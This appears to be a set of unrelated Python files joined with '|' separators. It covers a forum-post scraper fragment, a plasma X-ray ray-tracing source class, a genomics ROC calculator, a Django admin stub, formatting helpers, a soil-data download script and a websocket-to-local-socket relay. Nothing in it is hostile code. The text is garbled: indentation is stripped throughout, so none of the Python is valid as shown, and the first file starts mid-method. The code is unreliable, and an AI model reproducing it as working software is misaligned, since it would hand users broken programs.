""" Retrieve content of a floor
@param bool baha_code Outputs baha_code from /post1.php when this is set to True,
                              If not, outputs HTML from /Co.php.
        @param bool prettify  Outputs prettified HTML by BeautifulSoup if it is set.
"""
if baha_code and not prettify:
try:
response = requests.get("http://forum.gamer.com.tw/post1.php",
params={"bsn": self.bsn,
"snA": self.sna,
"sn": self.snb,
"type": "2", "re": "1"},
headers=REQHEADERS,
cookies=REQCOOKIES)
response.encoding = 'utf8'
soup = BeautifulSoup(response.text)
return re.search(r"^,bahacode:true,content:'([^']*?)'",
str(soup(id="form1")[0].find_all("script")),
flags=re.MULTILINE).group(1)
except IndexError:
                raise Exception('Not authenticated.'
' Set cookies by bpl.set_cookies(BAHAID, BAHARUNE) .')
elif baha_code and prettify:
raise ValueError('baha_code and prettify can\'t be true at the same time')
else:
try:
response = requests.get("http://forum.gamer.com.tw/Co.php",
params={"bsn": self.bsn, "sn": self.snb},
headers=REQHEADERS,
cookies=REQCOOKIES)
response.encoding = 'utf8'
soup = BeautifulSoup(response.text)
text = soup(id=("cf" + self.snb))[0]
return text.prettify() if prettify else text.text
except IndexError:
raise Exception('Not found. '
'The floor is probably deleted or requires authentication. '
'Try retrieving baha_code instead.')
@property
def comments(self):
""" The comments of each floors """
response = requests.get("http://forum.gamer.com.tw/ajax/moreCommend.php",
params={"bsn": self.bsn, "snB": self.snb},
headers=REQHEADERS,
cookies=REQCOOKIES)
response.encoding = 'utf8'
restext = re.sub(r'<!\[CDATA\[(.+?)\]\]', r'\1', response.text)
soup = BeautifulSoup(restext)
ret = []
for msg in soup("msg")[::-1]:
msg_ret = []
for msg_item in msg(True):
msg_ret.append({msg_item.name: msg_item.text})
ret.append(msg_ret)
return ret
|
# -*- coding: utf-8 -*-
"""
.. Authors
Novimir Pablant <npablant@pppl.gov>
James Kring <jdk0026@tigermail.auburn.edu>
Yevgeniy Yakusevich <eugenethree@gmail.com>
Contains the XicsrtPlasmaGeneric class.
"""
import logging
import numpy as np
from xicsrt.util import profiler
from xicsrt.tools import xicsrt_spread
from xicsrt.tools.xicsrt_doc import dochelper
from xicsrt.objects._GeometryObject import GeometryObject
from xicsrt.sources._XicsrtSourceFocused import XicsrtSourceFocused
@dochelper
class XicsrtPlasmaGeneric(GeometryObject):
"""
A generic plasma object.
Plasma object will generate a set of ray bundles where each ray bundle
has the properties of the plasma at one particular real-space point.
Each bundle is modeled by a SourceFocused object.
.. Note::
If a `voxel` type bundle is used rays may be generated outside of the
defined plasma volume (as defined by xsize, ysize and zsize). The bundle
*centers* are randomly distributed throughout the plasma volume, but this
means that if a bundle is (randomly) placed near the edges of the plasma
then the bundle voxel volume may extend past the plasma boundary. This
behavior is expected. If it is important to have a sharp plasma boundary
then consider using the 'point' bundle_type instead.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.filter_objects = []
def default_config(self):
"""
xsize
The size of this element along the xaxis direction.
ysize
The size of this element along the yaxis direction.
zsize
The size of this element along the zaxis direction.
angular_dist : string ('isotropic')
The type of angular distribution to use for the emitted rays.
Available distributions: 'isotropic', 'isotropic_xy', 'flat',
'flat_xy', 'gaussian', and 'gaussian_flat'.
See `XicsrtSourceGeneric` for documentation of each distribution.
Warning: Only the 'isotropic' distribution is currently supported!
spread: float (None) [radians]
The angular spread for the emission cone. The spread defines the
half-angle of the cone. See 'angular_dist' in :any:`XicsrtSourceGeneric`
for detailed documentation.
spread_radius: float (None) [meters]
If specified, the spread will be calculated for each bundle such that
the spotsize at the target matches the given radius. This is useful
when working with very extended plasma sources.
            This option is incompatible with 'spread'.
use_poisson
No documentation yet. Please help improve XICSRT!
wavelength_dist : string ('voigt')
No documentation yet. Please help improve XICSRT!
wavelength : float (1.0) [Angstroms]
No documentation yet. Please help improve XICSRT!
mass_number : float (1.0) [au]
No documentation yet. Please help improve XICSRT!
linewidth : float (0.0) [1/s]
No documentation yet. Please help improve XICSRT!
emissivity : float (0.0) [ph/m^3]
No documentation yet. Please help improve XICSRT!
temperature : float (0.0) [eV]
No documentation yet. Please help improve XICSRT!
velocity : float (0.0) [m/s]
No documentation yet. Please help improve XICSRT!
time_resolution : float (1e-3) [s]
No documentation yet. Please help improve XICSRT!
bundle_type : string ('voxel')
Define how the origin of rays within the bundle should be distributed.
Available options are: 'voxel' or 'point'.
bundle_volume : float (1e-3) [m^3]
The volume in which the rays within the bundle should distributed.
if bundle_type is 'point' this will not affect the distribution,
though it will still affect the number of bundles if bundle_count
is set to None.
bundle_count : int (None)
The number of bundles to generate. If set to `None` then this number
will be automatically determined by volume/bundle_volume. This default
means that each bundle represents exactly the given `bundle_volume` in
the plasma. For high quality raytracing studies this value should
generally be set to a value much larger than volume/bundle_volume!
max_rays : int (1e7)
No documentation yet. Please help improve XICSRT!
max_bundles : int (1e7)
No documentation yet. Please help improve XICSRT!
filters
No documentation yet. Please help improve XICSRT!
"""
config = super().default_config()
config['xsize'] = 0.0
config['ysize'] = 0.0
config['zsize'] = 0.0
config['angular_dist'] = 'isotropic'
config['spread'] = None
config['spread_radius'] = None
config['target'] = None
config['use_poisson'] = False
config['wavelength_dist'] = 'voigt'
config['wavelength'] = 1.0
config['wavelength_range'] = None
config['mass_number'] = 1.0
config['linewidth'] = 0.0
config['emissivity'] = 0.0
config['temperature'] = 0.0
config['velocity'] = 0.0
config['time_resolution'] = 1e-3
config['bundle_type'] = 'voxel'
config['bundle_volume'] = 1e-6
config['bundle_count'] = None
config['max_rays'] = int(1e7)
config['max_bundles'] = int(1e7)
config['filters'] = []
return config
def initialize(self):
super().initialize()
self.param['max_rays'] = int(self.param['max_rays'])
self.param['volume'] = self.config['xsize'] * self.config['ysize'] * self.config['zsize']
if self.param['bundle_count'] is None:
self.param['bundle_count'] = self.param['volume']/self.param['bundle_volume']
self.param['bundle_count'] = int(np.round(self.param['bundle_count']))
if self.param['bundle_count'] < 1:
raise Exception(f'Bundle volume is larger than the plasma volume.')
if self.param['bundle_count'] > self.param['max_bundles']:
raise ValueError(
f"Current settings will produce too many bundles ({self.param['bundle_count']:0.2e}). "
f"Increase the bundle_volume, explicitly set bundle_count or increase max_bundles.")
def setup_bundles(self):
self.log.debug('Starting setup_bundles')
if self.param['bundle_type'] == 'point':
self.param['voxel_size'] = 0.0
elif self.param['bundle_type'] == 'voxel':
self.param['voxel_size'] = self.param['bundle_volume'] ** (1/3)
# These values should be overwritten in a derived class.
bundle_input = {}
bundle_input['origin'] = np.zeros([self.param['bundle_count'], 3], dtype = np.float64)
bundle_input['temperature'] = np.ones([self.param['bundle_count']], dtype = np.float64)
bundle_input['emissivity'] = np.ones([self.param['bundle_count']], dtype = np.float64)
bundle_input['velocity'] = np.zeros([self.param['bundle_count'], 3], dtype = np.float64)
bundle_input['mask'] = np.ones([self.param['bundle_count']], dtype = np.bool)
bundle_input['spread'] = np.zeros([self.param['bundle_count']], dtype = np.float64)
bundle_input['solid_angle'] = np.zeros([self.param['bundle_count']], dtype = np.float64)
# randomly spread the bundles around the plasma box
offset = np.zeros((self.param['bundle_count'], 3))
offset[:,0] = np.random.uniform(-1 * self.param['xsize'] /2, self.param['xsize'] /2, self.param['bundle_count'])
offset[:,1] = np.random.uniform(-1 * self.param['ysize']/2, self.param['ysize']/2, self.param['bundle_count'])
offset[:,2] = np.random.uniform(-1 * self.param['zsize'] /2, self.param['zsize'] /2, self.param['bundle_count'])
bundle_input['origin'][:] = self.point_to_external(offset)
# Setup the bundle spread and solid angle.
bundle_input = self.setup_bundle_spread(bundle_input)
return bundle_input
def setup_bundle_spread(self, bundle_input):
"""
Calculate the spread and solid angle for each bundle.
        If the config option 'spread_radius' is provided, the spread will be
determined for each bundle by a spotsize at the target.
Note: Even if the idea of a spread radius is added to the generic
source object we still need to calculate and save the results
              here so that we can correctly calculate the bundle intensities.
"""
if self.param['spread_radius'] is not None:
vector = bundle_input['origin'] - self.param['target']
dist = np.linalg.norm(vector, axis=1)
spread = np.arctan(self.param['spread_radius']/dist)
else:
spread = self.param['spread']
bundle_input['spread'][:] = spread
        # For the time being the function solid_angle is not vectorized, so a
# loop is necessary.
for ii in range(len(bundle_input['spread'])):
bundle_input['solid_angle'][ii] = xicsrt_spread.solid_angle(bundle_input['spread'][ii])
return bundle_input
def get_emissivity(self, rho):
return self.param['emissivity']
def get_temperature(self, rho):
return self.param['temperature']
def get_velocity(self, rho):
return self.param['velocity']
def bundle_generate(self, bundle_input):
self.log.debug('Starting bundle_generate')
return bundle_input
def bundle_filter(self, bundle_input):
self.log.debug('Starting bundle_filter')
for filter in self.filter_objects:
bundle_input = filter.filter(bundle_input)
return bundle_input
def create_sources(self, bundle_input):
"""
Generate rays from a list of bundles.
bundle_input
          a dictionary of arrays giving the locations, emissivities,
          temperatures, and velocities of all ray bundles to be emitted.
"""
rays_list = []
count_rays_in_bundle = []
m = bundle_input['mask']
# Check if the number of rays generated will exceed max ray limits.
# This is only approximate since poisson statistics may be in use.
predicted_rays = int(np.sum(
bundle_input['emissivity'][m]
* self.param['time_resolution']
* self.param['bundle_volume']
* bundle_input['solid_angle'][m] / (4 * np.pi)
* self.param['volume']
/ (self.param['bundle_count'] * self.param['bundle_volume'])))
self.log.debug(f'Predicted rays: {predicted_rays:0.2e}')
if predicted_rays > self.param['max_rays']:
raise ValueError(
f"Current settings will produce too many rays ({predicted_rays:0.2e}). "
f"Please reduce integration time or adjust other parameters.")
# Bundle generation loop
for ii in range(self.param['bundle_count']):
if not bundle_input['mask'][ii]:
continue
profiler.start("Ray Bundle Generation")
source_config = dict()
# Specially dependent parameters
source_config['origin'] = bundle_input['origin'][ii]
source_config['temperature'] = bundle_input['temperature'][ii]
source_config['velocity'] = bundle_input['velocity'][ii]
source_config['spread'] = bundle_input['spread'][ii]
# Calculate the total number of photons to launch from this bundle
# volume. Since the source can use poisson statistics, this should
# be of floating point type.
intensity = (bundle_input['emissivity'][ii]
* self.param['time_resolution']
* self.param['bundle_volume']
* bundle_input['solid_angle'][ii] / (4 * np.pi))
# Scale the number of photons based on the number of bundles.
#
# Ultimately we allow bundle_volume and bundle_count to be
# independent, which means that a bundle representing a volume in
# the plasma can be launched from virtual volume of a different
# size.
#
# In order to allow this while maintaining overall photon statistics
# from the plasma, we normalize the intensity so that each bundle
# represents a volume of plasma_volume/bundle_count.
#
# In doing so bundle_volume cancels out, but I am leaving the
# calculation separate for clarity.
intensity *= self.param['volume'] / (self.param['bundle_count'] * self.param['bundle_volume'])
source_config['intensity'] = intensity
# constants
source_config['xsize'] = self.param['voxel_size']
source_config['ysize'] = self.param['voxel_size']
source_config['zsize'] = self.param['voxel_size']
source_config['zaxis'] = self.param['zaxis']
source_config['xaxis'] = self.param['xaxis']
source_config['target'] = self.param['target']
source_config['mass_number'] = self.param['mass_number']
source_config['wavelength_dist'] = self.param['wavelength_dist']
source_config['wavelength'] = self.param['wavelength']
source_config['wavelength_range'] = self.param['wavelength_range']
source_config['linewidth'] = self.param['linewidth']
source_config['angular_dist'] = self.param['angular_dist']
source_config['use_poisson'] = self.param['use_poisson']
#create ray bundle sources and generate bundled rays
source = XicsrtSourceFocused(source_config)
bundled_rays = source.generate_rays()
rays_list.append(bundled_rays)
count_rays_in_bundle.append(len(bundled_rays['mask']))
profiler.stop("Ray Bundle Generation")
profiler.start('Ray Bundle Collection')
# append bundled rays together to form a single ray dictionary.
# create the final ray dictionary
total_rays = np.int(np.sum(count_rays_in_bundle))
rays = dict()
rays['origin'] = np.zeros((total_rays,3), dtype=np.float64)
rays['direction'] = np.zeros((total_rays,3), dtype=np.float64)
rays['wavelength'] = np.zeros((total_rays), dtype=np.float64)
rays['weight'] = np.zeros((total_rays), dtype=np.float64)
rays['mask'] = np.ones((total_rays), dtype=np.bool)
index = 0
for ii, num_rays in enumerate(count_rays_in_bundle):
rays['origin'][index:index+num_rays] = rays_list[ii]['origin']
rays['direction'][index:index+num_rays] = rays_list[ii]['direction']
rays['wavelength'][index:index+num_rays] = rays_list[ii]['wavelength']
rays['weight'][index:index+num_rays] = rays_list[ii]['weight']
rays['mask'][index:index+num_rays] = rays_list[ii]['mask']
index += num_rays
profiler.stop('Ray Bundle Collection')
if len(rays['mask']) == 0:
raise ValueError('No rays generated. Check plasma input parameters')
self.log.debug('Bundles Generated: {:0.4e}'.format(
len(m[m])))
self.log.debug('Rays per bundle, mean: {:0.0f}'.format(
np.mean(count_rays_in_bundle)))
self.log.debug('Rays per bundle, median: {:0.0f}'.format(
np.median(count_rays_in_bundle)))
self.log.debug('Rays per bundle, max: {:0d}'.format(
np.max(count_rays_in_bundle)))
self.log.debug('Rays per bundle, min: {:0d}'.format(
np.min(count_rays_in_bundle)))
return rays
def generate_rays(self):
## Create an empty list of ray bundles
bundle_input = self.setup_bundles()
## Apply filters to filter out ray bundles
bundle_input = self.bundle_filter(bundle_input)
## Populate that list with ray bundle parameters, like emissivity
bundle_input = self.bundle_generate(bundle_input)
## Use the list to generate ray sources
rays = self.create_sources(bundle_input)
return rays
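# A minimal configuration sketch for this plasma source (keys are taken from
# default_config above; the numeric values are illustrative, not recommended
# settings). A 0.1 m cube gives a 1e-3 m^3 volume, so the default
# bundle_count = volume / bundle_volume = 1000.
#
#   config = {
#       'xsize': 0.1, 'ysize': 0.1, 'zsize': 0.1,
#       'bundle_volume': 1e-6,
#       'emissivity': 1e12, 'temperature': 1e3, 'wavelength': 3.95,
#       'target': [0.0, 0.0, 1.0],
#   }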
|
# coding=utf-8
#
# Copyright (c) 2010-2015 Illumina, Inc.
# All rights reserved.
#
# This file is distributed under the simplified BSD license.
# The full text can be found here (and in LICENSE.txt in the root folder of
# this distribution):
#
# https://github.com/Illumina/licenses/blob/master/Simplified-BSD-License.txt
import os
import abc
import pandas
import logging
import subprocess
import tempfile
def tableROC(tbl, label_column, feature_column, filter_column=None,
filter_name=None, roc_reversed=False):
"""Compute ROC table from TP/FP/FN classification table.
:param tbl: table with label and feature
:type tbl: pandas.DataFrame
:param label_column: column name which gives the label (TP/FP/FN)
:param feature_column: column name which gives the feature
:param filter_column: column that contains the filter fields
:param filter_name: column that contains the filter name
:param roc_reversed: reverse ROC behaviour
:returns: a pandas.DataFrame with TP/FP/FN/precision/recall columns.
"""
tf1 = tempfile.NamedTemporaryFile(delete=False)
tf1.close()
tf2 = tempfile.NamedTemporaryFile(delete=False)
tf2.close()
try:
fields = [feature_column, label_column]
if filter_column:
fields.append(filter_column)
tbl[fields].to_csv(tf2.name, sep="\t", index=False)
cmdline = "roc -t %s -v %s --verbose " % (label_column, feature_column)
if filter_column:
cmdline += " -f %s" % filter_column
if filter_name:
cmdline += " -n %s" % filter_name
if roc_reversed:
cmdline += " -R 1"
cmdline += " -o %s %s" % (tf1.name, tf2.name)
logging.info("Running %s" % cmdline)
subprocess.check_call(cmdline, shell=True)
try:
result = pandas.read_table(tf1.name)
        except Exception:
raise Exception("Cannot parse ROC output.")
return result
finally:
try:
os.unlink(tf1.name)
except:
pass
try:
os.unlink(tf2.name)
except:
pass
class ROC(object):
"""ROC calculator base class"""
__metaclass__ = abc.ABCMeta
classes = {}
features = {}
def __init__(self):
        self.ftname = ""
@abc.abstractmethod
def from_table(self, tbl):
""" Create ROC from feature table
:param tbl: the table
:type tbl: pandas.DataFrame
:rtype: pandas.DataFrame
"""
pass
@classmethod
def make(cls, cname):
# noinspection PyCallingNonCallable
c = cls.classes[cname]()
c.ftname = cls.features[cname]
return c
@classmethod
def register(cls, name, ftname, cons):
""" Register a ROC calculator
:param name: the name of the calculator
:param ftname: the features / feature table name
(will be accessible in the ftname attribute)
:param cons: class constructor
"""
cls.classes[name] = cons
cls.features[name] = ftname
@classmethod
def list(cls):
return cls.classes.keys()
class StrelkaSNVRoc(ROC):
"""ROC calculator for Strelka SNVs"""
def from_table(self, tbl):
tbl.loc[tbl["NT"] != "ref", "QSS_NT"] = 0
return tableROC(tbl, "tag",
"QSS_NT", "FILTER", "QSS_ref")
ROC.register("strelka.snv.qss", "hcc.strelka.snv", StrelkaSNVRoc)
class StrelkaSNVVQSRRoc(ROC):
"""ROC calculator for Strelka SNVs (newer versions which use VQSR)"""
def from_table(self, tbl):
tbl.loc[tbl["NT"] != "ref", "VQSR"] = 0
return tableROC(tbl, "tag",
"VQSR", "FILTER", "LowQscore")
ROC.register("strelka.snv.vqsr", "hcc.strelka.snv", StrelkaSNVVQSRRoc)
class StrelkaSNVEVSRoc(ROC):
"""ROC calculator for Strelka SNVs (newer versions where VQSR is called EVS)"""
def from_table(self, tbl):
tbl.loc[tbl["NT"] != "ref", "EVS"] = 0
return tableROC(tbl, "tag",
"EVS", "FILTER", "LowEVS")
ROC.register("strelka.snv", "hcc.strelka.snv", StrelkaSNVEVSRoc)
class StrelkaIndelRoc(ROC):
"""ROC calculator for Strelka Indels"""
def from_table(self, tbl):
# fix QSI for NT != ref
tbl.loc[tbl["NT"] != "ref", "QSI_NT"] = 0
return tableROC(tbl, "tag",
"QSI_NT", "FILTER", "QSI_ref")
ROC.register("strelka.indel", "hcc.strelka.indel", StrelkaIndelRoc)
class StrelkaIndelEVSRoc(ROC):
"""ROC calculator for Strelka Indels"""
def from_table(self, tbl):
# fix QSI for NT != ref
return tableROC(tbl, "tag",
"EVS", "FILTER", "LowEVS")
ROC.register("strelka.indel.evs", "hcc.strelka.indel", StrelkaIndelEVSRoc)
class Varscan2SNVRoc(ROC):
"""ROC calculator for Varscan2 SNVs"""
def from_table(self, tbl):
return tableROC(tbl, "tag", "SSC")
ROC.register("varscan2.snv", "hcc.varscan2.snv", Varscan2SNVRoc)
class Varscan2IndelRoc(ROC):
"""ROC calculator for Varscan2 Indels"""
def from_table(self, tbl):
return tableROC(tbl, "tag", "SSC")
ROC.register("varscan2.indel", "hcc.varscan2.indel", Varscan2IndelRoc)
class MutectSNVRoc(ROC):
"""ROC calculator for MuTect SNVs"""
def from_table(self, tbl):
return tableROC(tbl, "tag", "TLOD", "FILTER","t_lod_fstar")
ROC.register("mutect.snv", "hcc.mutect.snv", MutectSNVRoc)
class MutectIndelRoc(ROC):
"""ROC calculator for MuTect Indels"""
def from_table(self, tbl):
return tableROC(tbl, "tag", "TLOD", "FILTER","t_lod_fstar")
ROC.register("mutect.indel", "hcc.mutect.indel", MutectIndelRoc)
|
from django.contrib import admin
from .models import StudentSignup
class FeedbackAdmin(admin.ModelAdmin):
list_display = ('phone_number', 'classes')
class Meta:
model = StudentSignup
admin.site.register(StudentSignup, FeedbackAdmin)
|
def readable(nb, rounding=0):
if rounding == 0:
return '{:,}'.format(int(nb)).replace(',', ' ')
else:
return '{:,}'.format(round(nb, rounding)).replace(',', ' ')
def human_format(num):
magnitude = 0
while abs(num) >= 1000:
magnitude += 1
num /= 1000.0
# add more suffixes if you need them
return '%.2f%s' % (num, ['', 'K', 'M', 'G', 'T', 'P'][magnitude])
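# Worked examples (outputs follow directly from the formatting above):
#   readable(1234567)       -> '1 234 567'
#   readable(1234.5678, 2)  -> '1 234.57'
#   human_format(1234567)   -> '1.23M'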
|
#--------------------------------
# Name: download_soils.py
# Purpose: Download soil AWC raster
#--------------------------------
import argparse
import datetime as dt
import logging
import os
import sys
import _utils
def main(output_folder, overwrite_flag=False):
"""Download soil Available Water Capacity (AWC) raster
Parameters
----------
output_folder : str
Folder path where files will be saved.
overwrite_flag : bool, optional
If True, overwrite existing files (the default is False).
Returns
-------
None
"""
# Composite SSURGO/STATSGO
download_url = 'https://storage.googleapis.com/openet/ssurgo/AWC_WTA_0to10cm_composite.tif'
# STATSGO Only
# download_url = 'https://storage.googleapis.com/openet/statsgo/AWC_WTA_0to10cm_statsgo.tif'
output_name = download_url.split('/')[-1]
output_path = os.path.join(output_folder, output_name)
if not os.path.isdir(output_folder):
os.makedirs(output_folder)
if not os.path.isfile(output_path) or overwrite_flag:
logging.info('\nDownloading AWC')
logging.info(' {}'.format(download_url))
logging.info(' {}'.format(output_path))
_utils.url_download(download_url, output_path)
else:
logging.info('\nAWC raster already downloaded')
def arg_parse():
"""Base all default folders from script location
scripts: ./pymetric/tools/download
code: ./pymetric/code
output: ./pymetric/soils
"""
script_folder = sys.path[0]
code_folder = os.path.dirname(script_folder)
project_folder = os.path.dirname(code_folder)
output_folder = os.path.join(project_folder, 'soils')
parser = argparse.ArgumentParser(
description='Download Soil Available Water Capacity (AWC)',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'--output', default=output_folder, metavar='FOLDER',
help='Output folder')
parser.add_argument(
'-o', '--overwrite', default=None, action="store_true",
help='Force overwrite of existing files')
parser.add_argument(
'-d', '--debug', default=logging.INFO, const=logging.DEBUG,
help='Debug level logging', action="store_const", dest="loglevel")
args = parser.parse_args()
# Convert relative paths to absolute paths
if args.output and os.path.isdir(os.path.abspath(args.output)):
args.output = os.path.abspath(args.output)
return args
if __name__ == '__main__':
args = arg_parse()
logging.basicConfig(level=args.loglevel, format='%(message)s')
logging.info('\n{}'.format('#' * 80))
log_f = '{:<20s} {}'
logging.info(log_f.format(
'Run Time Stamp:', dt.datetime.now().isoformat(' ')))
logging.info(log_f.format('Script:', os.path.basename(sys.argv[0])))
main(output_folder=args.output, overwrite_flag=args.overwrite)
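# Example invocation (a sketch; the flags match the argparse definitions above
# and the output path is illustrative):
#
#   python download_soils.py --output ./pymetric/soils --overwrite --debug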
|
'''
Copyright (c) 2016-2017 Wind River Systems, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at:
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed
under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES
OR CONDITIONS OF ANY KIND, either express or implied.
'''
"""
This module contains the Relay class which is a secure way to pipe data to a
local socket connection. This is useful for Telnet which is not secure by
default.
"""
import logging
import random
import select
import socket
import ssl
import threading
import time
import sys
# -------------------------------------------------------------------
# Note: when using a proxy server, the socket class is overlayed with
# pysocks class. Keep around a local copy so that local socket
# connections don't use the proxy
# -------------------------------------------------------------------
non_proxy_socket = None
# yocto supports websockets, not websocket, so check for that
try:
import websocket
except ImportError:
import websockets as websocket
CONNECT_MSG = "CONNECTED-129812"
CONNECT_MULTI_MSG = 'CONNECTED-581273'
DISCONNECT_MULTI_MSG = 'DISCONNECTED-581273'
RELAY_VERSION = '2.0.0'
class Relay(object):
"""
Class for establishing a secure pipe between a cloud based websocket and a
local socket. This is useful for things like Telnet which are not secure to
use remotely.
"""
def __init__(self, wsock_host, sock_host, sock_port, secure=True,
log=None, local_socket=None, reconnect=False):
"""
Initialize a relay object for piping data between a websocket and a
local socket
"""
self.wsock_host = wsock_host
self.sock_host = sock_host
self.sock_port = sock_port
self.secure = secure
self.log = log
self.proxy = None
# for python3 str transformation
self.def_enc = "ISO-8859-1"
self.log_name = "Relay:{}:{}({:0>5})".format(self.sock_host,
self.sock_port,
random.randint(0,99999))
self.reconnect = reconnect
if self.log is None:
self.logger = logging.getLogger(self.log_name)
log_handler = logging.StreamHandler()
#log_formatter = logging.Formatter(constants.LOG_FORMAT, datefmt=constants.LOG_TIME_FORMAT)
#log_handler.setFormatter(log_formatter)
self.logger.addHandler(log_handler)
self.logger.setLevel(logging.DEBUG)
self.log = self.logger.log
self.running = False
self.thread = None
self.ws_thread = None
self.lsock = []
self.wsock = None
self.track_ws = None
self.lconnect = 0
self._multi_channel = False
# track sockets and idx
self.lsocket_map = {}
def _connect_local(self, idx=0):
self.log(logging.DEBUG, "_connect_local idx {}".format(idx))
ret = False
try:
# check for proxy. If not proxy, this
# is None.
s = None
if non_proxy_socket:
s = non_proxy_socket(socket.AF_INET,
socket.SOCK_STREAM)
else:
s = socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, True)
s.connect((self.sock_host, self.sock_port))
s.setblocking(0)
self.lsock.append(s)
self.lsocket_map[s] = idx
self.log(logging.DEBUG, "connected to {}.".format(self.sock_port))
except socket.error as err:
self.running = False
ret = True
self.log(logging.ERROR, "{} Failed to open local socket.".format(self.log_name))
self.log(logging.ERROR, "Reason: {} ".format(str(err)))
return ret
def _prepend_index(self, idx, data):
# python3 data is in bytes format and must be decoded before
# prepending. Python2 is in str format so you can easily
# prepend the idx.
if sys.version_info[0] > 2:
d = chr(idx)
d += data.decode(self.def_enc)
d = bytes(d, self.def_enc)
else:
d = chr(idx) + data
return d
def _encode_data(self, d):
"""
Python 3 has different encoding for streams, bytes vs
bytearray. Need to encode for py3. Py2 just return the data.
"""
if sys.version_info[0] > 2:
# Only encode if the type is str, some protocols are mixed
if isinstance(d, str):
raw_data = bytes(d, self.def_enc)
else:
raw_data = d
else:
raw_data = d
return raw_data
def _strip_index(self, d):
if sys.version_info[0] > 2:
raw_data = bytes(d, self.def_enc)
idx = raw_data[0]
data = raw_data[1:]
else:
# don't change the encoding for py2, this corrupts ssl
raw_data = bytearray(d)
idx = raw_data[0]
del raw_data[0]
data = raw_data
return data, int(idx)
def _on_local_message(self):
"""
Main loop that pipes all data from one socket to the next. The
websocket connection is established first and has its own
callback, so this is where the local socket will be handled.
"""
# ws data must be in binary format. The websocket lib uses
# this op code
op_binary = 0x2
op_text = 0x1
close_ws = False
while self.running is True and not close_ws:
if self.lsock:
data = ''
read_sockets, write_sockets, _es = select.select(self.lsock, [], [], 1)
for s in read_sockets:
try:
data = s.recv(1024)
self.log(logging.DEBUG, "idx {} recv {} from local socket".format(self.lsocket_map[s], len(data)))
except:
# during a close a read might return a EBADF,
# that is ok, pass it don't dump an exception
pass
if data:
# get the idx
idx = self.lsocket_map[s]
try:
if self._multi_channel:
d = self._prepend_index(idx, data)
else:
d = data
self.wsock.send(d, opcode=op_binary)
self.log(logging.DEBUG, "send {} to WS".format(len(d)))
except websocket.WebSocketConnectionClosedException:
self.log(logging.ERROR, "Websocket closed")
close_ws = True
break
else:
self.log(logging.INFO, "{}: Received NULL from local socket".format(self.log_name))
if self.reconnect and self.running and self._multi_channel:
# multi channel: notify dra, and dra will
# send a new connect msg in _on_message
idx = self.lsocket_map[s]
self.log(logging.INFO, "Disconnecting local socket idx {}".format(idx))
# note: disconnect must be string
self.wsock.send(chr(idx) + DISCONNECT_MULTI_MSG, opcode=op_text)
self.lsock.remove(s)
self.lsocket_map.pop(s, None)
break
else:
self.log(logging.INFO, "Disconnecting all sockets")
self.running = False
break
else:
time.sleep(0.1)
for s in self.lsock:
if s:
s.close()
self.lsocket_map[s] = None
self.lsock = []
self.lsocket_map = {}
self.log(logging.INFO, "{} - Sockets Closed".format(self.log_name))
def _on_open(self, ws):
self.log(logging.INFO, "_on_open: starting thread loop")
self.track_ws = ws
self.thread = threading.Thread(target=self._on_local_message)
self.thread.start()
def _on_message(self, ws, data):
# make sure we can parse data as a string below
if not isinstance(data, str):
data = str(data, self.def_enc)
if data:
idx = 0
if data == CONNECT_MSG:
# If the local socket has not been established yet,
# and we have received the connection string, start
# local socket.
self._connect_local()
self.lconnect = 1
self.log(logging.DEBUG, "{} Local socket opened".format(self.log_name))
elif DISCONNECT_MULTI_MSG in data:
self.log(logging.DEBUG, "Received disconnect message")
for i in list(self.lsocket_map.keys()):
if self.lsocket_map[i] == idx:
i.close()
self.lsock.remove(i)
self.lsocket_map.pop(i, None)
elif CONNECT_MULTI_MSG in data:
# this will be called for every new connection
# on reconnect, send the idx + DISCONN message on ws
# get the idx. data comes in as binary ascii, need to
# ord/chr it before recv/send
idx = ord(data[0])
self.log(logging.DEBUG, "{} Local socket opened idx {}".format(self.log_name, idx))
self._connect_local(idx=idx)
self._multi_channel = True
else:
# send to local socket
if self._multi_channel:
s_data, idx = self._strip_index(data)
self.log(logging.DEBUG, "_on_message {}: send {} -> local socket".format(idx,len(data)))
data = s_data
enc_data = self._encode_data(data)
s = None
for i in self.lsocket_map.keys():
if self.lsocket_map[i] == idx:
s = i
break
if s:
s.send(enc_data)
def _on_error(self, ws, exception):
self.log(logging.ERROR, "_on_error: {}".format(str(exception)))
self._on_close(ws)
if self.wsock:
self.wsock.close()
self.stop()
def _on_close(self, ws):
self.log(logging.INFO,"_on_close: websocket closed")
for s in self.lsocket_map.keys():
if s:
self.log(logging.DEBUG, "Closing sock {}".format(self.lsocket_map[s]))
s.close()
self.lsocket_map = {}
self.running = False
def start(self):
"""
Establish the websocket connection and start the main loop
"""
if not self.running:
self.running = True
sslopt = {}
if not self.secure:
sslopt["cert_reqs"] = ssl.CERT_NONE
self.wsock = websocket.WebSocketApp(
self.wsock_host,
on_message=self._on_message,
on_error=self._on_error,
on_close=self._on_close,
on_open=self._on_open)
kwargs = {'sslopt': sslopt}
if self.proxy:
self.log(logging.DEBUG, "start:self.proxy={} ".format(self.proxy)),
kwargs['http_proxy_host'] = self.proxy.host
kwargs['http_proxy_port'] = self.proxy.port
self.ws_thread = threading.Thread(target=self.wsock.run_forever, kwargs=kwargs)
self.ws_thread.start()
else:
raise RuntimeError("{} - Already running!".format(self.log_name))
def stop(self):
"""
Stop piping data between the two connections and stop the loop thread
"""
self.log(logging.INFO, "{} Stopping".format(self.log_name))
self.running = False
self.reconnect = False
if self.track_ws:
self.track_ws.close()
if self.thread:
self.thread.join()
self.thread = None
if self.ws_thread:
# websocket client joins the thread
self.ws_thread = None
relays = []
def create_relay(url, host, port, secure=True, log_func=None, local_socket=None,
reconnect=False, proxy=None):
global relays, non_proxy_socket
non_proxy_socket = local_socket
newrelay = Relay(url, host, port, secure=secure, log=log_func, reconnect=reconnect)
if proxy:
newrelay.proxy = proxy
newrelay.start()
relays.append(newrelay)
def stop_relays():
global relays
threads = []
while relays:
relay = relays.pop()
thread = threading.Thread(target=relay.stop)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
def relay_version():
return RELAY_VERSION
